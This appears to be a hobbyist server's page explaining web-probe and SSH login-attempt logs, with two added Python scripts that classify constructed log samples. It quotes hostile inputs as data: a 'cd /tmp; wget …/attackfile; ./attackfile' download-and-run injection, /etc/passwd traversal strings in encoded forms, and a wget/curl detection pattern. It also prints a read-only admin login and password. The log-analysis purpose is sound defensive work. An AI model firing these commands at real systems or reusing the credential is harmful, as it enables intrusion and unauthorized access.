polycosmic-zervertest.zapto.org
Web Accesses and Login Attempts Received from the World
Log Analysis
request_uri -- /web/v1/probes.html
Any internet-connected system with any ports exposed to the wild and woolly internet
should expect probes and scans from many addresses around the planet.
If this is such a system,
there may be entertaining stuff in the Log Files.
Notes on results that can be selected above --
Weblog Status Codes --
- 200 -- OK, the URL was recognized and a web page was returned.
- 301, 302 -- Redirect. In the detail logs,
this is typically followed immediately by the GET or POST to the redirected location.
- 404 -- Not Found, no such /directory/, file or web page.
- 401 -- Unauthorized, i.e. authentication needed. In the detail logs,
this can be followed by a repeat of the request, but with a userid and passphrase supplied.
- 400 -- Bad Request, malformed or unrecognized format.
For the URL "/", the root of the document tree,
this can occur for malformation of some additional data (the request headers or body)
that is not shown in these log entries.
- There are many other status values.
Random observations for Weblog URLs --
- .env files -- if found, expected to contain "environment values"
that might be useful to a program,
such as PATH, which describes where on a system to look for programs for command names.
Web applications frequently keep security-related values here,
such as database passwords and API keys to be supplied automatically
when the application logs in to another system,
so an .env file that the web server is willing to serve hands those credentials to whoever asks.
- .git files -- git is a source-code control system
used with software development and could be used for web-site development.
A scanner requesting /.git/config or /.git/HEAD is checking whether the repository
was copied into the document tree along with the site;
if it was, the source code and its whole change history can be downloaded,
which reveals the inner workings of the web-site.
- .php files -- PHP is a programming language frequently used in web-site development.
Requests for common .php file names are looking for an installed PHP application
that can be exploited.
- wp- files -- WordPress is an elaborate blogging and content-management program
whose core, plugins and themes have a long record of security vulnerabilities.
Requests for wp-login.php, wp-admin/ and wp-content/plugins/ paths
are checking whether WordPress is installed, and which version and plugins are present.
- GET /web/dnld/... -- This directory has a number of large files
first created when this represented a product from a functioning company,
including software-update files with a ".tar" suffix,
bootable CD image files (also containing software-update files) with an ".iso" suffix,
and bootable disk images (compressed) suitable for VirtualBox
with ".vdi.gz" and ".vhd.zip" suffixes.
There are not a lot of NetZerver products in use on the planet,
and it is not clear why there should be so many downloads of these files.
There have been reports of a group
looking for and downloading ".iso" files
hoping to find copyright-protected commercial releases,
with a business plan to threaten a site for copyright violations.
There may be downloads from agencies looking for trade-secret information
inadvertently left publicly accessible.
These files may be raw material for download speed tests.
None of this seems to explain why there would be so many downloads
to so many places.
- \x16\x03... operations -- non-printable characters, hexadecimal 16 and 03, where the
operation GET, POST, or HEAD is expected.
These are the first bytes of a TLS handshake record (content type 0x16, protocol version 0x03):
either a client that tried to speak HTTPS to a plain-HTTP port,
or a scanner sending one deliberately, looking for an entertaining mis-handling.
- { lines -- a request line that begins with "{" is a JSON body sent where the request line belongs,
apparently looking for a web-server that will treat it
as some kind of RPC-Remote-Procedure-Call (JSON-RPC) message.
- ../ and .%2e/ and .%2e%2f -- In path names in the URL part and in URL parameters after the '?',
"../" means to go one directory closer to the file-system root,
in an attempt to access a file that is outside of the web documents part of the file-system,
frequently ../../etc/passwd.
The %2e and %2f forms are the URL-encoded '.' and '/';
they are used to slip past filters that look only for the literal "../",
so a log check needs to decode the path (twice, to catch %252e as well) before looking for "../".
- wget -- This program can fetch files over the internet,
and can be found (as can curl) as part of the parameters for a URL that is intended
to execute as a command.
Frequently part of "cd /tmp; wget IPaddr/attackfile; ./attackfile"
trying to download and then run a file on the target system.
The status code shows only whether this server recognized the URL;
the attempt itself is the interesting part.
- favicon -- If found, can be used for a tiny graphic on a web-browser tab,
or with a line in a bookmark list.
There can be multiple favicon files for different environments, e.g. apple-touch-icon.png.
- robots.txt -- Intended as direction to a search-engine scan,
naming parts of the web-site to be indexed and parts to be left alone.
- IPaddrs masked to /24 or /64 -- A request from an individual using a web-browser
can be a small swarm of requests for the web-page,
any associated graphic files and favicon files,
all coming from a single IPv4 or IPv6 InternetProtocol address,
within a few seconds.
Deliberate scans, both search-engines and attack-bots,
frequently use multiple IP addresses that are closely associated.
Listing 32-bit IPv4 addresses by their /24 prefix (the first 24 bits, a block of 256 addresses),
and 128-bit IPv6 addresses by their /64 prefix (the usual size of one customer's allocation),
is an attempt at identifying closely-associated accesses.
This is not ideal.
For example, "googlebot" addresses are in a group with a whois listing
of 66.249.64.0 up to 66.249.95.255, a much larger /19 range,
which this grouping splits across 32 separate /24 lines.
- host or whois lookup -- on Linux/Unix systems, the commands "host" IPaddr and "whois" IPaddr
can sometimes reveal a DNS name or some organization info about the address.
This is frequently pointless, showing a rent-a-system at Amazon, Google, or Microsoft,
paid for by the attacker,
or one which may have been compromised by discovery of a vulnerability
and is running a scan quietly in the background,
unknown to those who are paying the rent.
The Web access values are discarded with each reboot,
and discarded above a limit size.
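The URL patterns and the /24 and /64 grouping listed above can be checked mechanically. The following Python script is an added example, not the page's own log-analysis software: it parses combined-format access-log lines, assigns each request to one of the categories discussed (TLS bytes on an HTTP port, "{" request lines, encoded traversal, wget/curl command injection, .env, .git, wp- and .php probes, /web/dnld/ downloads, favicon and robots.txt), and groups the source addresses by /24 or /64 prefix. The log lines and addresses in it are constructed (documentation address ranges); the category names, the rule ordering and the file-name rules are this example's own choices.

```python
"""Classify access-log request lines into the probe categories described above
and group the sources by /24 (IPv4) or /64 (IPv6) prefix.
Added example, not the page's own software; sample log lines are constructed."""
import ipaddress
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache/nginx combined-log prefix: client ident user [time] "request" status size.
# The request field may contain backslash escapes such as \x16 or \", so the
# pattern allows an escaped character inside the quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+)'
)
METHODS = {"GET", "POST", "HEAD", "OPTIONS", "PUT", "DELETE"}


def classify(request: str) -> str:
    """Map one request line to a probe category (first matching rule wins)."""
    # TLS ClientHello on a plaintext port: record type 0x16, version 0x03.
    # Apache writes the bytes as the escaped text \x16\x03, so check both forms.
    if request.startswith(r"\x16\x03") or request.startswith("\x16\x03"):
        return "tls-on-http"
    if request.startswith("{"):
        return "json-rpc-probe"          # JSON body where the request line belongs
    parts = request.split(" ")
    if len(parts) != 3 or parts[0] not in METHODS:
        return "malformed"
    # Decode twice so %2e%2e%2f and the double-encoded %252e%252e%252f
    # both become the literal "../" that the traversal check looks for.
    decoded = unquote(unquote(parts[1]))
    if re.search(r"\b(?:wget|curl)\b", decoded):
        return "command-injection"       # e.g. ?cmd=cd /tmp;wget host/x;./x
    if "../" in decoded or "..\\" in decoded:
        return "path-traversal"
    filename = decoded.split("?", 1)[0]  # path without the query string
    if "/.env" in filename:
        return "env-file"
    if "/.git" in filename:
        return "git-exposure"
    if "/wp-" in filename:
        return "wordpress-probe"         # before .php: wp-login.php is both
    if filename.lower().endswith(".php"):
        return "php-probe"
    if filename.startswith("/web/dnld/"):
        return "download"
    if filename in ("/favicon.ico", "/robots.txt") or "apple-touch-icon" in filename:
        return "browser-support"
    return "normal"


def source_prefix(ip: str) -> str:
    """Collapse an address to its /24 (IPv4) or /64 (IPv6) network, as the listing does."""
    addr = ipaddress.ip_address(ip)
    plen = 24 if addr.version == 4 else 64
    return str(ipaddress.ip_network(f"{addr}/{plen}", strict=False))


def summarize(lines):
    """Return (category counts, {prefix: category counts}) for an iterable of log lines."""
    by_category = Counter()
    by_prefix = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            by_category["unparsed"] += 1
            continue
        category = classify(m["request"])
        by_category[category] += 1
        by_prefix[source_prefix(m["ip"])][category] += 1
    return by_category, dict(by_prefix)


# Constructed sample (not real traffic); the raw string keeps Apache's \x escapes literal.
SAMPLE_LOG = r"""
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /.env HTTP/1.1" 404 196
203.0.113.9 - - [10/Mar/2024:12:00:02 +0000] "GET /.git/config HTTP/1.1" 404 196
203.0.113.200 - - [10/Mar/2024:12:00:03 +0000] "GET /phpinfo.php HTTP/1.1" 404 196
198.51.100.4 - - [10/Mar/2024:12:00:04 +0000] "GET /wp-login.php HTTP/1.1" 404 196
198.51.100.4 - - [10/Mar/2024:12:00:05 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 400 0
198.51.100.4 - - [10/Mar/2024:12:00:06 +0000] "GET /?cmd=cd%20/tmp;wget%20198.51.100.99/attackfile;./attackfile HTTP/1.1" 404 196
192.0.2.1 - - [10/Mar/2024:12:00:07 +0000] "\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03" 400 226
192.0.2.1 - - [10/Mar/2024:12:00:08 +0000] "{ \"jsonrpc\": \"2.0\", \"method\": \"ping\" }" 400 226
2001:db8:1:2::5 - - [10/Mar/2024:12:00:09 +0000] "GET /favicon.ico HTTP/1.1" 200 1150
2001:db8:1:2::5 - - [10/Mar/2024:12:00:09 +0000] "GET /robots.txt HTTP/1.1" 200 36
2001:db8:1:2:abcd::9 - - [10/Mar/2024:12:00:10 +0000] "GET /web/dnld/update.tar HTTP/1.1" 200 104857600
2001:db8:1:2::5 - - [10/Mar/2024:12:00:11 +0000] "GET /web/v1/probes.html HTTP/1.1" 200 8192
""".strip()

if __name__ == "__main__":
    categories, prefixes = summarize(SAMPLE_LOG.splitlines())
    for category, n in categories.most_common():
        print(f"{n:4d}  {category}")
    for prefix, counts in sorted(prefixes.items()):
        print(prefix, dict(counts))
```

Run it against a real access log with `summarize(open("/var/log/apache2/access.log"))`. Decoding the path twice is what makes the .%2e/ and %252e forms fall into the same bucket as a plain ../; the two IPv6 hosts in the sample land on the same /64 line exactly as the page's listing would group them.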
Random observations for LoginLog --
- AttackBot behavior, upon stumbling onto an open port,
can vary from one Login attempt every 25 minutes
(intended to be unnoticeable on casual examination of the Logfile)
from a single IPaddress,
to multiple attempts every minute using a swarm of widely-separated IPaddresses,
each used no more than 30 times,
over the course of months.
- Frequent userids for a recent low-frequency attack -- root, admin, ubuntu.
- Userids for a high-volume attack seem to be taken from some list,
rather than just generated, e.g. as all 3-letter combinations.
- This software does not capture the attempted passwords,
except when the userid-password list apparently got a bit out-of-sync
and showed "userids" of "123456" and "p@ssword".
- You might see a successful ssh_check rsync_ssh login by cbertsch,
as part of the updates to this web-site.
The Login Log is maintained over system reboot,
but results are discarded above a (likely different) limit size.
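The two attack styles described above, a slow trickle from one address versus a swarm of addresses each used a limited number of times, can be told apart from the spacing of the failures per source. The following Python script is an added example, not the page's own LoginLog software: it reads sshd "Failed password" and "Accepted" lines in syslog format, profiles each source address by attempt count and median gap between attempts, and tallies the attempted userids. The auth.log lines below are constructed (documentation address ranges and a made-up host name); the 20-minute threshold and the 30-attempt cap are this example's own parameters, chosen from the figures quoted above.

```python
"""Profile sshd login failures by source address and attempted userid.
Added example, not the page's own LoginLog software; sample lines are constructed."""
import re
import statistics
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Classic syslog timestamps carry no year; strptime fills in 1900, which is fine
# for gaps between attempts as long as the log does not cross a year boundary.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} {1,2}\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3} {1,2}\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def _parse_ts(text: str) -> datetime:
    return datetime.strptime(re.sub(r" +", " ", text), "%b %d %H:%M:%S")


def parse_log(lines):
    """Return (failures, accepted) as lists of (timestamp, user, ip) tuples."""
    failures, accepted = [], []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            failures.append((_parse_ts(m["ts"]), m["user"], m["ip"]))
            continue
        m = ACCEPTED_RE.match(line)
        if m:
            accepted.append((_parse_ts(m["ts"]), m["user"], m["ip"]))
    return failures, accepted


def profile_sources(failures, slow_gap=timedelta(minutes=20), swarm_cap=30):
    """Per source IP: attempt count, median gap between attempts, and a style label.

    'low-and-slow' = widely spaced attempts from one address (meant to hide in the log);
    'burst' = attempts seconds apart; 'single' = one attempt only. over_cap flags an
    address used more than swarm_cap times, which the swarms described above avoid.
    """
    times = defaultdict(list)
    for ts, _user, ip in failures:
        times[ip].append(ts)
    profile = {}
    for ip, stamps in times.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median_gap = statistics.median(gaps) if gaps else None
        if median_gap is None:
            style = "single"
        elif median_gap >= slow_gap.total_seconds():
            style = "low-and-slow"
        else:
            style = "burst"
        profile[ip] = {"attempts": len(stamps), "median_gap_s": median_gap,
                       "style": style, "over_cap": len(stamps) > swarm_cap}
    return profile


def top_users(failures, n=5):
    """Most frequently attempted userids, e.g. the root/admin/ubuntu trio noted above."""
    return Counter(user for _ts, user, _ip in failures).most_common(n)


# Constructed sample (not a real log): 203.0.113.7 trickles one attempt every 25 minutes,
# three other addresses each fire three attempts within seconds, one real login succeeds.
SAMPLE_AUTH_LOG = """
Mar 10 12:00:00 zerver sshd[1001]: Failed password for root from 203.0.113.7 port 51001 ssh2
Mar 10 12:25:00 zerver sshd[1002]: Failed password for invalid user admin from 203.0.113.7 port 51002 ssh2
Mar 10 12:30:01 zerver sshd[1010]: Failed password for root from 198.51.100.10 port 40001 ssh2
Mar 10 12:30:01 zerver sshd[1011]: Failed password for invalid user admin from 198.51.100.10 port 40002 ssh2
Mar 10 12:30:02 zerver sshd[1012]: Failed password for invalid user test from 198.51.100.10 port 40003 ssh2
Mar 10 12:30:02 zerver sshd[1013]: Failed password for root from 198.51.100.11 port 40004 ssh2
Mar 10 12:30:03 zerver sshd[1014]: Failed password for invalid user ubuntu from 198.51.100.11 port 40005 ssh2
Mar 10 12:30:03 zerver sshd[1015]: Failed password for invalid user guest from 198.51.100.11 port 40006 ssh2
Mar 10 12:30:04 zerver sshd[1016]: Failed password for invalid user admin from 192.0.2.20 port 40007 ssh2
Mar 10 12:30:04 zerver sshd[1017]: Failed password for root from 192.0.2.20 port 40008 ssh2
Mar 10 12:30:05 zerver sshd[1018]: Failed password for invalid user oracle from 192.0.2.20 port 40009 ssh2
Mar 10 12:40:00 zerver sshd[1020]: Accepted publickey for cbertsch from 203.0.113.50 port 42000 ssh2
Mar 10 12:50:00 zerver sshd[1003]: Failed password for invalid user ubuntu from 203.0.113.7 port 51003 ssh2
Mar 10 13:15:00 zerver sshd[1004]: Failed password for root from 203.0.113.7 port 51004 ssh2
""".strip()

if __name__ == "__main__":
    failures, accepted = parse_log(SAMPLE_AUTH_LOG.splitlines())
    for ip, info in profile_sources(failures).items():
        print(ip, info)
    print("top userids:", top_users(failures))
    print("successful logins:", [(u, ip) for _t, u, ip in accepted])
```

On a real system feed it `parse_log(open("/var/log/auth.log"))` (or the output of `journalctl -u ssh`). Note that the slow source never shows more than one failure in any 20-minute window, which is exactly why a glance at the tail of the log misses it; only the per-address count over the whole file brings it out.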
If this is expected to be a low-traffic system,
then almost all of this traffic is the result of
various bots doing automated scans of parts of the internet address space.
Some of these scans are benign -- e.g. Google builds its indexes
by regularly scanning every system that has a name.
Some are benign-ish -- companies probing for security problems,
not to steal data or cause damage,
but to sell or provide security monitoring.
Most are looking for exploit opportunities,
to steal data,
to encrypt data for ransom,
or to load and run the attacker's code
to use the target's cpu and network bandwidth
for further scans of other systems.
Note that for at least one of the systems carrying this text,
at polycosmic.net,
the detailed log files can be examined
using a "read-only" admin userid "rodmin",
with credential "Heisenberg42".
Contact us at polycosmic.info /at/ gmail
or at cbertsch /at/ cox.net
All text on this website,
nonsense and otherwise,
is 100% organic generated,
with one exception:
On Contact-Us webpage,
some answers to "I-am-not-a-robot" field
appear to be generated by robots.